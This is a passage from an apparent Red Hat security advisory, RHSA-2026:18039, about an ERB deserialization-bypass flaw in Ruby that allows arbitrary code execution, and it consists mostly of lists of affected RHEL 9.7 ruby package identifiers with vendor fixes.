"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "erb: ERB: Arbitrary code execution via deserialization bypass"
}
]
}
RHSA-2026:18039
Vulnerability from csaf_redhat - Published: 2026-05-18 12:25 - Updated: 2026-05-18 14:18A flaw was found in ERB, a templating system for Ruby. An attacker who can trigger deserialization of untrusted data in a Ruby application can bypass existing protections. This vulnerability allows for arbitrary code execution by exploiting specific public methods that evaluate template source code, which were not properly guarded against deserialization attacks.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x | — |
Vendor Fix
fix
